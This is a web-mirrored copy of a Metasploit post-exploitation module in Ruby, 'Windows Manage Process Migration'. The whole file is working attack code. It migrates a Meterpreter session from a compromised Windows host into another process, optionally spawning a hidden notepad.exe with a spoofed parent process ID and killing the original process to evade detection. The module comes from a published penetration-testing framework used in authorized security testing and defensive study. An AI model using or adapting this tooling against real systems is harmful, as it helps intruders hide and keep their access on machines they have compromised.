Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/migrate.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Post::Common
8
include Msf::Post::Windows::Process
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Windows Manage Process Migration',
15
'Description' => %q{
16
This module will migrate a Meterpreter session from one process
17
to another. A given process PID to migrate to or the module can spawn one and
18
migrate to that newly spawned process.
19
},
20
'License' => MSF_LICENSE,
21
'Author' => [
22
'Carlos Perez <carlos_perez[at]darkoperator.com>',
23
'phra <https://iwantmore.pizza>'
24
],
25
'Platform' => [ 'win' ],
26
'SessionTypes' => [ 'meterpreter' ],
27
'Compat' => {
28
'Meterpreter' => {
29
'Commands' => %w[
30
core_migrate
31
stdapi_sys_config_getenv
32
stdapi_sys_process_attach
33
stdapi_sys_process_execute
34
stdapi_sys_process_kill
35
]
36
}
37
},
38
'Notes' => {
39
'Stability' => [CRASH_SERVICE_DOWN],
40
'SideEffects' => [CONFIG_CHANGES],
41
'Reliability' => []
42
}
43
)
44
)
45
46
register_options(
47
[
48
OptBool.new('SPAWN', [false, 'Spawn process to migrate to. If set, notepad.exe is used.', true]),
49
OptInt.new('PID', [false, 'PID of process to migrate to.', 0]),
50
OptInt.new('PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).', 0]),
51
OptString.new('PPID_NAME', [false, 'Name of process for PPID spoofing when creating a new process.']),
52
OptString.new('NAME', [false, 'Name of process to migrate to.']),
53
OptBool.new('KILL', [false, 'Kill original process for the session.', false])
54
]
55
)
56
end
57
58
def run
59
hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
60
print_status("Running module against #{hostname} (#{session.session_host})")
61
62
server = session.sys.process.open
63
original_pid = server.pid
64
print_status("Current server process: #{server.name} (#{server.pid})")
65
66
target_pid = nil
67
68
if datastore['SPAWN'] && (datastore['SPAWN'] != '')
69
target_pid = create_temp_proc
70
elsif datastore['PID'] && (datastore['PID'] != 0)
71
target_pid = datastore['PID']
72
elsif datastore['NAME'] && (datastore['NAME'] != '')
73
target_pid = session.sys.process[datastore['NAME']]
74
end
75
76
if !target_pid || !has_pid?(target_pid)
77
print_error("Process #{target_pid} not found")
78
return
79
end
80
81
begin
82
print_status("Migrating into #{target_pid}")
83
session.core.migrate(target_pid)
84
print_good("Successfully migrated into process #{target_pid}")
85
rescue StandardError => e
86
print_error('Could not migrate into process')
87
print_error("Exception: #{e.class} : #{e}")
88
end
89
90
if datastore['KILL']
91
print_status("Killing original process with PID #{original_pid}")
92
if has_pid?(original_pid)
93
session.sys.process.kill(original_pid)
94
print_good("Successfully killed process with PID #{original_pid}")
95
else
96
print_warning("PID #{original_pid} exited on its own")
97
end
98
end
99
end
100
101
# Creates a temp notepad.exe to migrate to depending the architecture.
102
def create_temp_proc
103
target_ppid = session.sys.process[datastore['PPID_NAME']] || datastore['PPID']
104
cmd = get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)
105
106
print_status('Spawning notepad.exe process to migrate into')
107
108
if (target_ppid != 0) && !has_pid?(target_ppid)
109
print_error("Process #{target_ppid} not found")
110
return
111
end
112
113
if has_pid?(target_ppid)
114
print_status("Spoofing PPID #{target_ppid}")
115
end
116
117
# run hidden
118
proc = session.sys.process.execute(cmd, nil, {
119
'Hidden' => true,
120
'ParentPid' => target_ppid
121
})
122
123
return proc.pid
124
end
125
end
126
127